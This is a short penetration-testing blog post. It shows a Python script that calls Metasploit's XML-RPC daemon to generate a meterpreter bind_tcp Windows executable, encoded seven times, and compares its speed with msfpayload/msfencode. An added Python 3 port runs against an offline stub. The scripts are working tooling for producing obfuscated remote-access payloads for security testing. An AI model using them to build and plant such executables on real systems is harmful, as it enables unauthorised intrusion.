I wrote a quick xmlrpc test to get an executable payload from Metasploit, encoding it 7 times with whatever encoder it thinks is best. The code I'm using hasn't been committed or submitted yet, but if you want to test it I can provide you with a patch until I'm happy enough with it to submit it.
import sys
import xmlrpclib
import binascii

# Connect to the msfrpcd XML-RPC listener and authenticate; every later
# call needs the session token returned here.
proxy = xmlrpclib.ServerProxy("http://localhost:55553")
ret = proxy.auth.login("msf", "abc123")
if ret['result'] == 'success':
    token = ret['token']
else:
    sys.stderr.write("Could not login\n")
    sys.exit(1)  # don't fall through to module.execute with no token

# Ask the payload module for an exe, encoded 7 times with whatever
# encoder Metasploit picks.
opts = {
    "Format": 'exe',
    "Iterations": 7,
    "ForceEncode": True}
ret = proxy.module.execute(token, "payload", "windows/meterpreter/bind_tcp", opts)
if ret['result'] == 'success':
    # The payload comes back hex-encoded; write the raw bytes to stdout
    # so the script can be redirected straight into a file.
    sys.stdout.write(binascii.unhexlify(ret['payload']))
Next, I decided to do a test of the xmlrpc vs the traditional way of doing it:
root@bt:~/msfmods/py# time (python get_payload.py > /tmp/test3)
real 0m3.839s
user 0m0.020s
sys 0m0.043s
root@bt:~/msfmods/py# time (~/metasploit/msfpayload windows/meterpreter/bind_tcp raw | ~/metasploit/msfencode -t exe -c 5 -o /tmp/test2 2>/dev/null )
real 0m10.548s
user 0m7.553s
sys 0m2.920s
root@bt:~/msfmods/py# file /tmp/test2 /tmp/test3
/tmp/test2: MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit
/tmp/test3: MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit
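As an added example (not the post's own code), here is a Python 3 port of the client above, run against a small in-process stub that mimics the two RPC calls the post uses (auth.login and module.execute) so the exchange can be exercised offline. The stub's credentials, token and the bytes it returns are constructed for the demo, and no real msfrpcd is contacted; the client also repeats the `MZ` sanity check that `file` performed above.

```python
import binascii
import threading
import xmlrpc.client
from xmlrpc.server import SimpleXMLRPCServer

# Constructed stand-in for an encoded exe: only the 'MZ' magic is meaningful.
FAKE_PE = b"MZ" + b"\x90" * 62 + b"PE\x00\x00"
DEMO_TOKEN = "TEMP-TOKEN-0001"  # constructed, not a real msf token


def _login(user, password):
    """Stub of auth.login with the result/token shape seen in the post."""
    if (user, password) == ("msf", "abc123"):
        return {"result": "success", "token": DEMO_TOKEN}
    return {"result": "failure"}


def _execute(token, mtype, mname, opts):
    """Stub of module.execute: hands back the 'payload' hex-encoded."""
    if token != DEMO_TOKEN or mtype != "payload":
        return {"result": "failure", "error": "bad token or module type"}
    return {"result": "success", "payload": binascii.hexlify(FAKE_PE).decode()}


def start_stub():
    """Serve both stubbed methods on a random loopback port in a daemon thread."""
    srv = SimpleXMLRPCServer(("127.0.0.1", 0), logRequests=False)
    srv.register_function(_login, "auth.login")
    srv.register_function(_execute, "module.execute")
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def fetch_payload(url, user, password, module, iterations=7):
    """Client side: log in, request an encoded exe, unhexlify, check the MZ magic."""
    proxy = xmlrpc.client.ServerProxy(url)
    ret = proxy.auth.login(user, password)
    if ret["result"] != "success":
        raise RuntimeError("could not log in")
    opts = {"Format": "exe", "Iterations": iterations, "ForceEncode": True}
    ret = proxy.module.execute(ret["token"], "payload", module, opts)
    if ret["result"] != "success":
        raise RuntimeError("module.execute failed: %s" % ret.get("error"))
    data = binascii.unhexlify(ret["payload"])
    if not data.startswith(b"MZ"):  # the same check `file` did above, inline
        raise ValueError("response is not a PE image")
    return data


if __name__ == "__main__":
    srv = start_stub()
    url = "http://127.0.0.1:%d" % srv.server_address[1]
    print("%d bytes fetched" % len(fetch_payload(url, "msf", "abc123", "windows/meterpreter/bind_tcp")))
    srv.shutdown()
```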
It definitely appears we have a speed increase, and with the additional overhead of an auth in the way, it's possible to take a little bit more time off of it. Being able to do this over XMLRPC hopefully will give a good way for folks to grab payloads remotely and easily for common tasks.
Have thoughts or suggestions?
Hit me up at sussurro [aT] happypacket DOT net